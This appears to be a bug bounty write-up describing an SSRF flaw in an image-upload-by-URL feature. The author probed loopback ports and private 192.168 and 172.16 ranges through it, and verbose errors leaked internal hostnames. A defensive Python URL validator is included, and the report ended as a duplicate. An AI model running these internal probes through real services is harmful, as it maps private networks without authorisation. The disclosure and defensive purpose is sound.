[hackerone] - A bug bounty report submitted far too late
Title
Internal Ports Scanning and IPs Scanning via SSRF
Weakness
SSRF
The report I submitted this time is for an SSRF vulnerability.
With an SSRF attack you can scan internal IPs or ports.
The site has a feature where you either upload an image or enter an image URL and the server fetches that image.
Just on the off chance, I entered http://127.0.0.1 and got the result below.
[127.0.0.1]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)
Looking at the error message, a request was sent to 127.0.0.1 and a 503 came back...
In other words, an SSRF attack is possible.
To do a port scan I sent requests based on well-known ports, but the results weren't much help.
>> https://127.0.0.1:0
{"data":{"error":{"code":1011,"message":"[127.0.0.1:0]: Invalid URL (https:\/\/127.0.0.1:0)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":400}
>> https://127.0.0.1:1
{"data":{"error":{"code":2011,"message":"[127.0.0.1:1]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:7
{"data":{"error":{"code":2011,"message":"[127.0.0.1:7]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:9
{"data":{"error":{"code":2011,"message":"[127.0.0.1:9]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
...
>> https://127.0.0.1:443
{"data":{"error":{"code":2011,"message":"[127.0.0.1:443]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
I gave up on the port scan and just entered internal IPs to see what results came out.
First I sent requests across the whole `192.168.0.0/24` range, and got a `time out`, which is different from the output above.
>> https://192.168.0.128
{"data":{"error":{"code":2011,"message":"[192.168.0.128]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.64
{"data":{"error":{"code":2011,"message":"[192.168.0.64]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.32
{"data":{"error":{"code":2011,"message":"[192.168.0.32]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.192
{"data":{"error":{"code":2011,"message":"[192.168.0.192]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.1
{"data":{"error":{"code":2011,"message":"[192.168.0.1]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
When I sent requests to the `172.16.0.0/24` range, some useful information came out.
Some of the internal IPs had their own internal domain names, and you can see the domain name being printed.
>> https://172.16.0.163
[172.16.0.163]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'larynx.domain-name.com' does not match target host name '172.16.0.163')
>> https://172.16.0.131
[172.16.0.131]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.131')
>> https://172.16.0.132
[172.16.0.132]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.132')
>> https://172.16.0.135
[172.16.0.135]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.135')
>> https://172.16.0.102
[172.16.0.102]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.102')
>> https://172.16.0.8
[172.16.0.8]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.8')
>> https://172.16.0.12
[172.16.0.12]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'browserevents.domain-name.com' does not match target host name '172.16.0.12')
>> https://172.16.0.109
[172.16.0.109]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)
>> https://172.16.0.45
[172.16.0.45]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.45')
>> https://172.16.0.176
[172.16.0.176]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'monitor.production.domain-name-ops.com' does not match target host name '172.16.0.176')
>> https://172.16.0.117
[172.16.0.117]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.117')
>> https://172.16.0.155
[172.16.0.155]: Image could not be downloaded (curl error: 28; Operation timed out after 0 milliseconds with 0 out of 0 bytes received)
>> https://172.16.0.158
[172.16.0.158]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.158')
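As an added example (my code, not the affected site's or HackerOne's), this is the check a defender would want in front of the "fetch image by URL" feature: decide whether the destination is a public address before the fetcher ever connects, and return only a generic error to the client so proxy status codes and certificate subject names never reach the user. The function names, the port allowlist and the error string are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical pre-fetch check for an "image by URL" feature (added example, not
# the affected site's code). Run it before curl gets the URL and on every redirect
# target, so the fetcher never reaches 127.0.0.1, 192.168.x.x or 172.16.x.x hosts.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# What the client should see on failure; the raw curl detail (proxy status code,
# certificate subject name) belongs in server-side logs only.
GENERIC_ERROR = "Image could not be downloaded"

def resolve_addresses(host):
    """Return the set of IP addresses a hostname resolves to (empty if none)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return set()
    # sockaddr[0] is the address; drop any IPv6 scope suffix such as '%eth0'.
    return {ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos}

def is_public_address(ip):
    """True only for globally routable unicast addresses (no loopback, RFC 1918,
    link-local such as 169.254.169.254, CGNAT, reserved or multicast)."""
    return ip.is_global and not ip.is_multicast

def validate_fetch_url(url):
    """Return (allowed, reason) without opening any outbound connection."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, "unsupported scheme"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        port = parsed.port  # ValueError for non-numeric or out-of-range ports
    except ValueError:
        return False, "invalid port"
    if port is not None and port not in ALLOWED_PORTS:
        return False, "unexpected port"
    try:
        addrs = {ipaddress.ip_address(host)}  # literal IP in the URL
    except ValueError:
        addrs = resolve_addresses(host)  # hostname: check what it resolves to
    if not addrs:
        return False, "unresolvable host"
    if not all(is_public_address(a) for a in addrs):
        return False, "target is not a public address"
    return True, "ok"
```

Resolving the hostname here is not enough on its own against DNS rebinding; the fetcher should also connect to the address that was validated rather than resolving a second time.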
Since the site is vulnerable to SSRF, I wondered what I would get if I sent requests using the internal domain names...
I at least wanted to see an image from that internal network, but nothing came out..
So, since the SSRF vulnerability exists, I reported it to HackerOne, and a bot told me to wait and someone would get back to me later.
But a few hours later someone left a comment, and when I read it... someone had already reported the exact same vulnerability...
The comment author shared that report with me, and reading it, someone had already reported it three years ago.
The funny thing is that more than 10 people besides me had submitted the same report, and in the comments someone had written "It's been 3 years, why haven't you fixed it yet? Aren't other people wasting their time?"..
In conclusion, the report I submitted was marked as a duplicate.
Anyway... let me just be satisfied with having found a vulnerability like this in the real world...